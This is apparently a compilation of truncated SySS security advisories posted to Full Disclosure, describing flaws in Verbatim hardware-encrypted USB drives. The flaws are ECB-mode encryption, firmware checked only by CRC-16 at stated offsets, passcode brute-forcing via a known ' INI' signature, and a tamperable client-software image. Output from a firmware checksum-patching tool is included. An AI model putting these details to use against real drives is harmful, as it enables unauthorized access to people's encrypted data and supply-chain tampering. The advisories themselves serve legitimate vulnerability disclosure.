Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Keypad Secure https:/
[FD] [SYSS-2022-005]: Verbatim Store 'n' Go Secure Portable HDD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28384)
Advisory ID: SYSS-2022-005 Product: Store 'n' Go Secure Portable HDD Manufacturer: Verbatim Affected Version(s): GD25LK01-3637-C VER4.0 Tested Version(s): GD25LK01-3637-C VER4.0 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:High Solution Status: Open Manufacturer Notification: 2022-01-31 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28384 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the SSD will lock and require re-formatting after 20 failed password attempts." [1] Due to an insecure design, the Verbatim Store 'n' Go Secure Portable HDD is vulnerable to an offline brute-force attack for finding out the correct passcode, and thus gaining unauthorized access to the stored encrypted data. Vulnerability Details: When analyzing the external SSD Verbatim Store 'n' Go Secure Portable HDD, Matthias Deeg found out it uses an insecure design which allows for offline brute-force attacks against the passcode. The device consists of following four main parts: 1. a Toshiba SSD (MQ04ABF100) 2. an USB-to-SATA bridge controller (INIC-3637EN) 3. a SPI flash memory chip (XT25F01D) containing the firmware of the INIC-3637EN 4. a keypad controller (unknown chip, marked "SW611 2121") For encrypting the data stored on the SSD, the hardware AES engine of the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic Codebook) mode is used for data encryption, which is also a security issue by itself described in SySS security advisory SYSS-2022-002 [2]. The cryptographic key for the actual data encryption, the so-called data encryption key (DEK) is stored in a special sector of the SSD which in turn is encrypted using AES-256-ECB with a so-called key encryption key (KEK). This KEK is derived from the entered passcode which can be between five and twelve digits long, and generated by the keypad controller. When the unlock button is pressed on the Verbatim Store 'n' Go Secure Portable HDD, this generated AES 256-bit key is transmitted via SPI communication from the keypad controller to the USB-to-SATA bridge controller INIC-3637EN for configuring the corresponding hardware AES engine. For verifying the entered passcode, the firmware of the INIC-3637EN reads and decrypts the special sector on the SSD with the provided KEK, and checks specific data offsets for the known byte pattern (signature) "0x20 0x49 0x4E 0x49" which represents the string " INI". If this byte pattern could successfully be found, the entered passcode and its derived AES key is very likely correct, and enables the firmware access to the decrypted DEK, which can then be used to decrypt the actual SSD user data. This described design of the Verbatim Store 'n' Go Secure Portable HDD allows for offline brute-force attacks for finding the correct passcode. Because an attacker can generate and observe the derived AES keys (KEK) of the keypad for all possible passcodes, and then try to correctly decrypt the data of specific SSD sector. If the magic byte pattern " INI" can be found in the expected places of the resulting plaintext, the correct passcode was found, which then allows for gaining unauthorized access to the encrypted user data. Proof of Concept (PoC): For demonstrating the offline brute-force attack, Matthias Deeg developed a sample brute-forcing software tool which checks the complete search space of all possible passcodes between 5 and 12 digits. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-31: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website fo
[FD] [SYSS-2022-011]: Verbatim Executive Fingerprint Secure SSD - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)
Advisory ID: SYSS-2022-011 Product: Executive Fingerprint Secure SSD Manufacturer: Verbatim Affected Version(s): GDMSFE01-INI3637-C VER1.1 Tested Version(s): GDMSFE01-INI3637-C VER1.1 Vulnerability Type:Missing Immutable Root of Trust in Hardware (CWE-1326) Risk Level:Medium Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28383 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to insufficient firmware validation, an attacker can store malicious firmware code for the USB-to-SATA bridge controller on the USB drive which gets executed. Vulnerability Details: When analyzing the Verbatim Executive Fingerprint Secure SSD, Matthias Deeg found out that the validation of the firmware for the USB-to-SATA bridge controller INIC-3637EN only consists of a simple CRC-16 check (XMODEM CRC-16). Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01D), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called "supply chain attack" when the device is still on its way to its legitimate user. An attacker with temporary physical access during the supply could program a modified firmware on the Verbatim Executive Fingerprint Secure SSD, which always uses an attacker-controlled AES key for the data encryption, for example. If, later on, the attacker gains access to the used USB drive, he can simply decrypt all contained user data. Proof of Concept (PoC): SySS was able to read and write the SPI flash memory containing the firmware of the INIC-3637EN controller (128 KB) using a universal programmer. By analyzing the dumped memory content, SySS found out that the INIC-3637EN firmware is stored from the file offset 0x4000 to the file offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at the file offset 0x1FFFC. Matthias Deeg developed a simple Python tool for updating the checksum of modified firmware images before writing them to the SPI flash memory chip. The following output exemplarily shows updating a modified firmware image: $ python update-firmaware.py firmware_hacked.bin Verbatim Executive Fingerprint Secure SSD Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022 [*] Computed CRC-16 (0x7087) does not match stored CRC-16 (0x48EE). [*] Successfully updated firmware file Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-02-03: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Executive Fingerprint Secure SSD https://www.verbatim-europe.co.uk/en/prod/executive-fingerprint-secure-ssd-usb-32-gen-1--usb-c-1tb-53657/ [2] SySS Security Advisory SYSS-2022-011 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-011.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaim
[FD] [SYSS-2022-015]: Verbatim Fingerprint Secure Portable Hard Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)
Advisory ID: SYSS-2022-015 Product: Fingerprint Secure Portable Hard Drive Manufacturer: Verbatim Affected Version(s): #53650 Tested Version(s): #53650 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28382 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The hard drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to the use of an insecure encryption AES mode (Electronic Codebook), an attacker may be able to extract information even from encrypted data, for example by observing repeating byte patterns. Vulnerability Details: When analyzing the Verbatim Fingerprint Secure Portable Hard Drive, Matthias Deeg found out that the firmware of the USB-to-SATA bridge controller INIC-3637EN uses AES-256 with the ECB (Electronic Codebook) mode. This operation mode of block ciphers like AES encrypts identical plaintext data, in this case blocks of 16 bytes, always to identical ciphertext data. For some data, for instance bitmap images, the lack of the cryptographic property called diffusion concerning the ECB mode can leak sensitive information even in encrypted data. One famous example for this is an ECB-encrypted image of the TUX penguin, which, for instance, is referenced in the Wikipedia article about block cipher modes of operation[2] to illustrate this issue. Thus, the use of the ECB operation mode can put the confidentiality of specific information at risk, even in an encrypted form. Additionally, in attack scenarios where an attacker has short-time physical access to a Verbatim Fingerprint Secure Portable Hard Drive, and later returns it to its legitimate owner, the attacker may be able to compromise the integrity of the stored data by exploiting the fact that the same 16-byte plaintext blocks result in the same 16-byte ciphertext blocks, by replacing specific encrypted 16-byte blocks with other ones. Proof of Concept (PoC): The same 16 byte long plaintext pattern was written several times to an unlocked Verbatim Fingerprint Secure Portable Hard Drive. When the hard drive was then read using another drive enclosure, the same 16 byte long ciphertext pattern could be observed for the corresponding plaintext data. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-02-03: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Fingerprint Secure Portable Hard Drive https://www.verbatim-europe.co.uk/en/prod/fingerprint-secure-portable-hard-drive-1tb-53650/ [2] Wikipedia article about block cipher mode of operation https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB) [3] SySS Security Advisory SYSS-2022-015 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-015.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in thi
[FD] [SYSS-2022-017]: Verbatim Fingerprint Secure Portable Hard Drive - Insufficient Verification of Data Authenticity (CWE-345) (CVE-2022-28385)
Advisory ID: SYSS-2022-017 Product: Fingerprint Secure Portable Hard Drive Manufacturer: Verbatim Affected Version(s): #53650 Tested Version(s): #53650 Vulnerability Type:Insufficient Verification of Data Authenticity (CWE-345) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28385 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Fingerprint Secure Portable Hard Drive is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The hard drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to missing integrity checks, an attacker can manipulate the content of the emulated CD-ROM drive containing the Windows and macOS client software. Vulnerability Details: When analyzing the Verbatim Fingerprint Secure Portable Hard Drive, Matthias Deeg found out that the content of the emulated CD-ROM drive containing the Windows and macOS client software can be manipulated. The content of this emulated CD-ROM drive is stored as ISO-9660 image in the "hidden" sectors of the USB drive that can only be accessed using special IOCTL commands, or when installing the drive in an external disk enclosure. The following output exemplarily shows the content of the ISO-9660 file system: # mount hidden_sectors.bin /mnt/ # lsd -laR /mnt/ dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 . drwxr-xr-x root root 4.0 KB Fri Jan 7 16:39:47 2022 .. .r-xr-xr-x root root 70 B Wed Aug 14 09:20:40 2019 Autorun.inf dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 MAC dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 Windows /mnt/MAC: dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 . dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 .. .r-xr-xr-x root root 13 KB Fri Aug 9 09:03:24 2019 setup dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 Source /mnt/MAC/Source: dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 . dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 .. .r-xr-xr-x root root 5.9 MB Mon Jul 22 06:22:24 2019 gtk_dylib.tar .r-xr-xr-x root root 1.0 MB Wed Aug 14 06:25:10 2019 VERBATIM_B0_V1.1.tar /mnt/Windows: dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 . dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 .. .r-xr-xr-x root root 5.6 KB Fri Aug 9 10:47:26 2019 English.txt .r-xr-xr-x root root 6.6 KB Fri Aug 9 10:47:26 2019 French.txt .r-xr-xr-x root root 6.2 KB Fri Aug 9 10:47:26 2019 German.txt dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 Ico .r-xr-xr-x root root 6.2 KB Fri Aug 9 10:47:26 2019 Italian.txt .r-xr-xr-x root root 512 B Fri Aug 9 10:47:26 2019 license.bin .r-xr-xr-x root root 160 KB Fri Aug 9 10:47:26 2019 odbccp32.dll .r-xr-xr-x root root 7.1 KB Fri Aug 9 10:47:26 2019 Spanish.txt .r-xr-xr-x root root 4.9 MB Wed Aug 14 09:12:49 2019 VerbatimSecure.exe /mnt/Windows/Ico: dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 . dr-xr-xr-x root root 2.0 KB Wed Aug 14 10:28:51 2019 .. .r-xr-xr-x root root 34 KB Fri Aug 9 10:47:26 2019 Verbatim.ico By manipulating this ISO-9660 image or replacing it with another one, an attacker is able to store malicious software on the emulated CD-ROM drive which then may get executed by an unsuspecting victim when using the device. For example, an attacker with temporary physical access during the supply could program a modified ISO-9660 image on the Verbatim Fingerprint Secure Portable Hard Drive, which always uses an attacker- controlled password for unlocking the device. If, later on, the attacker gains access to the used USB drive, he can simply decrypt all contained user data. Storing other arbitrary, malicious software is also possible. Proof of Concept (PoC): SySS could successfully modify the content of the ISO-9660 image containing the Windows and macOS software for unlocking and managing the Verbatim Fingerprint Secure Portalbe Hard Drive.
[FD] [SYSS-2022-002]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)
Advisory ID: SYSS-2022-002 Product: Keypad Secure USB 3.2 Gen 1 Drive Manufacturer: Verbatim Affected Version(s): Part Number #49428 Tested Version(s): Part Number #49428 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-01-27 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28382 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for passcode input. The USB Drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the device will lock and require re-formatting after 20 failed passcode attempts."[1] Due to the use of an insecure encryption AES mode (Electronic Codebook), an attacker may be able to extract information even from encrypted data, for example by observing repeating byte patterns. Vulnerability Details: When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found out that the firmware of the USB-to-SATA bridge controller INIC-3637EN uses AES-256 with the ECB (Electronic Codebook) mode. This operation mode of block ciphers like AES encrypts identical plaintext data, in this case blocks of 16 bytes, always to identical ciphertext data. For some data, for instance bitmap images, the lack of the cryptographic property called diffusion concerning the ECB mode can leak sensitive information even in encrypted data. One famous example for this is an ECB-encrypted image of the TUX penguin, which, for instance, is referenced in the Wikipedia article about block cipher modes of operation[2] to illustrate this issue. Thus, the use of the ECB operation mode can put the confidentiality of specific information at risk, even in an encrypted form. Additionally, in attack scenarios where an attacker has short-time physical access to a Verbatim Keypad Secure USB drive, and later returns it to its legitimate owner, the attacker may be able to compromise the integrity of the stored data by exploiting the fact that the same 16-byte plaintext blocks result in the same 16-byte ciphertext blocks, by replacing specific encrypted 16-byte blocks with other ones. Proof of Concept (PoC): The same 16 byte long plaintext pattern was written several times to an unlocked Verbatim Keypad Secure USB drive. When the SSD was then read using another SSD enclosure, the same 16 byte long ciphertext pattern could be observed for the corresponding plaintext data. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-27: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Keypad Secure https://www.verbatim-europe.co.uk/en/prod/verbatim-keypad-secure-usb-32-gen-1-drive-64gb-49428/# [2] Wikipedia article about block cipher mode of operation https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB) [3] SySS Security Advisory SYSS-2022-002 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-002.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of th
[FD] [SYSS-2022-003]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)
Advisory ID: SYSS-2022-003 Product: Keypad Secure USB 3.2 Gen 1 Drive Manufacturer: Verbatim Affected Version(s): Part Number #49428 Tested Version(s): Part Number #49428 Vulnerability Type:Missing Immutable Root of Trust in Hardware (CWE-1326) Risk Level:Medium Solution Status: Open Manufacturer Notification: 2022-01-27 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28383 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for passcode input. The USB Drive does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the device will lock and require re-formatting after 20 failed passcode attempts."[1] Due to insufficient firmware validation, an attacker can store malicious firmware code for the USB-to-SATA bridge controller on the USB drive which gets executed. Vulnerability Details: When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found out that the validation of the firmware for the USB-to-SATA bridge controller INIC-3637EN only consists of a simple CRC-16 check (XMODEM CRC-16). Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01D), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called "supply chain attack" when the device is still on its way to its legitimate user. An attacker with temporary physical access during the supply could program a modified firmware on the Verbatim Keypad Secure, which always uses an attacker-controlled AES key for the data encryption, for example. If, later on, the attacker gains access to the used USB drive, he can simply decrypt all contained user data. Proof of Concept (PoC): SySS was able to read and write the SPI flash memory containing the firmware of the INIC-3637EN controller (128 KB) using a universal programmer. By analyzing the dumped memory content, SySS found out that the INIC-3637EN firmware is stored from the file offset 0x4000 to the file offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at the file offset 0x1FFFC. Matthias Deeg developed a simple Python tool for updating the checksum of modified firmware images before writing them to the SPI flash memory chip. The following output exemplarily shows updating a modified firmware image: $ python update-firmaware.py firmware_hacked.bin Verbatim Secure Keypad Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022 [*] Computed CRC-16 (0x03F5) does not match stored CRC-16 (0x8B17). [*] Successfully updated firmware file Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-27: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Keypad Secure https://www.verbatim-europe.co.uk/en/prod/verbatim-keypad-secure-usb-32-gen-1-drive-64gb-49428/# [2] GitHub repository of flashrom https://github.com/flashrom/flashrom [3] SySS Security Advisory SYSS-2022-003 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-003.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may
[FD] [SYSS-2022-006]: Verbatim Store 'n' Go Secure Portable HDD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)
Advisory ID: SYSS-2022-006 Product: Store 'n' Go Secure Portable HDD Manufacturer: Verbatim Affected Version(s): GD25LK01-3637-C VER4.0 Tested Version(s): GD25LK01-3637-C VER4.0 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:Low Solution Status: Open Manufacturer Notification: 2022-01-31 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28382 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the SSD will lock and require re-formatting after 20 failed password attempts."[1] Due to the use of an insecure encryption AES mode (Electronic Codebook), an attacker may be able to extract information even from encrypted data, for example by observing repeating byte patterns. Vulnerability Details: When analyzing the external SSD Verbatim Store 'n' Go Secure Portable HDD, Matthias Deeg found out that the firmware of the USB-to-SATA bridge controller INIC-3637EN uses AES-256 with the ECB (Electronic Codebook) mode. This operation mode of block ciphers like AES encrypts identical plaintext data, in this case blocks of 16 bytes, always to identical ciphertext data. For some data, for instance bitmap images, the lack of the cryptographic property called diffusion concerning the ECB mode can leak sensitive information even in encrypted data. One famous example for this is an ECB-encrypted image of the TUX penguin, which, for instance, is referenced in the Wikipedia article about block cipher modes of operation[2] to illustrate this issue. Thus, the use of the ECB operation mode can put the confidentiality of specific information at risk, even in an encrypted form. Additionally, in attack scenarios where an attacker has short-time physical access to a Verbatim Store 'n' Go Portable Secure HDD, and later returns it to its legitimate owner, the attacker may be able to compromise the integrity of the stored data by exploiting the fact that the same 16-byte plaintext blocks result in the same 16-byte ciphertext blocks, by replacing specific encrypted 16-byte blocks with other ones. Proof of Concept (PoC): The same 16 byte long plaintext pattern was written several times to an unlocked Verbatim Store 'n' Go Secure Portable HDD. When the SSD was then read using another SSD enclosure, the same 16 byte long ciphertext pattern could be observed for the corresponding plaintext data. Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-31: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Store 'n' Go Secure Portable HDD https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/ [2] Wikipedia article about block cipher mode of operation https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB) [3] SySS Security Advisory SYSS-2022-006 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-006.txt [4] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated
[FD] [SYSS-2022-007]: Verbatim Store 'n' Go Secure Portable HDD - Missing Immutable Root of Trust in Hardware (CWE-1326) (CVE-2022-28383)
Advisory ID: SYSS-2022-007 Product: Store 'n' Go Secure Portable HDD Manufacturer: Verbatim Affected Version(s): GD25LK01-3637-C VER4.0 Tested Version(s): GD25LK01-3637-C VER4.0 Vulnerability Type:Missing Immutable Root of Trust in Hardware (CWE-1326) Risk Level:Medium Solution Status: Open Manufacturer Notification: 2022-01-31 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28383 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive with AES 256-bit hardware encryption and a built-in keypad for passcode entry. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time with a built-in keypad for password input. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption. Also, if it falls into the wrong hands, the SSD will lock and require re-formatting after 20 failed password attempts."[1] Due to insufficient firmware validation, an attacker can store malicious firmware code for the USB-to-SATA bridge controller on the external drive which gets executed. Vulnerability Details: When analyzing the external SSD Verbatim Store 'n' Go Secure Portable HDD, Matthias Deeg found out that the validation of the firmware for the USB-to-SATA bridge controller INIC-3637EN only consists of a simple CRC-16 check (XMODEM CRC-16). Thus, an attacker is able to store malicious firmware code for the INIC-3637EN with a correct checksum on the used SPI flash memory chip (XT25F01D), which then gets successfully executed by the USB-to-SATA bridge controller. For instance, this security vulnerability could be exploited in a so-called "supply chain attack" when the device is still on its way to its legitimate user. An attacker with temporary physical access during the supply could program a modified firmware on the Verbatim Keypad Secure, which always uses an attacker-controlled AES key for the data encryption, for example. If, later on, the attacker gains access to the used USB drive, he can simply decrypt all contained user data. Proof of Concept (PoC): SySS was able to read and write the SPI flash memory containing the firmware of the INIC-3637EN controller (128 KB) using a universal programmer. By analyzing the dumped memory content, SySS found out that the INIC-3637EN firmware is stored from the file offset 0x4000 to the file offset 0x1BFFB, and that the corresponding XMODEM CRC-16 is stored at the file offset 0x1FFFC. Matthias Deeg developed a simple Python tool for updating the checksum of modified firmware images before writing them to the SPI flash memory chip. The following output exemplarily shows updating a modified firmware image: $ python update-firmaware.py firmware_hacked.bin Verbatim Store 'n' Go Firmware Updater v0.1 - Matthias Deeg, SySS GmbH (c) 2022 [*] Computed CRC-16 (0x03F5) does not match stored CRC-16 (0x8B17). [*] Successfully updated firmware file Solution: SySS GmbH is not aware of a solution for the described security issue. Disclosure Timeline: 2022-01-31: Vulnerability reported to manufacturer 2022-02-11: Vulnerability reported to manufacturer again 2022-03-07: Vulnerability reported to manufacturer again 2022-06-08: Public release of security advisory References: [1] Product website for Verbatim Store 'n' Go Secure Portable HDD https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/ [2] SySS Security Advisory SYSS-2022-007 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-007.txt [3] SySS GmbH, SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Matthias Deeg of SySS GmbH. E-Mail: matthias.deeg (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may
[FD] [SYSS-2022-009]: Verbatim Executive Fingerprint Secure SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28387)
Advisory ID: SYSS-2022-009 Product: Executive Fingerprint Secure SSD Manufacturer: Verbatim Affected Version(s): GDMSFE01-INI3637-C VER1.1 Tested Version(s): GDMSFE01-INI3637-C VER1.1 Vulnerability Type:Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) Risk Level:High Solution Status: Open Manufacturer Notification: 2022-02-03 Solution Date: - Public Disclosure: 2022-06-08 CVE Reference: CVE-2022-28387 Author of Advisory:Matthias Deeg (SySS GmbH) Overview: The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES 256-bit hardware encryption and a built-in fingerprint sensor for unlocking the device with previously registered fingerprints. The manufacturer describes the product as follows: "The AES 256-bit Hardware Encryption seamlessly encrypts all data on the drive in real-time. The drive is compliant with GDPR requirements as 100% of the drive is securely encrypted. The built-in fingerprint recognition system allows access for up to eight authorised users and one administrator who can access the device via a password. The SSD does not store passwords in the computer or system's volatile memory making it far more secure than software encryption."[1] Due to an insecure design, the Verbatim Executive Fingerprint Secure SSD can be unlocked by an attacker who can thus gain unauthorized access to the stored data. Vulnerability Details: When analyzing the 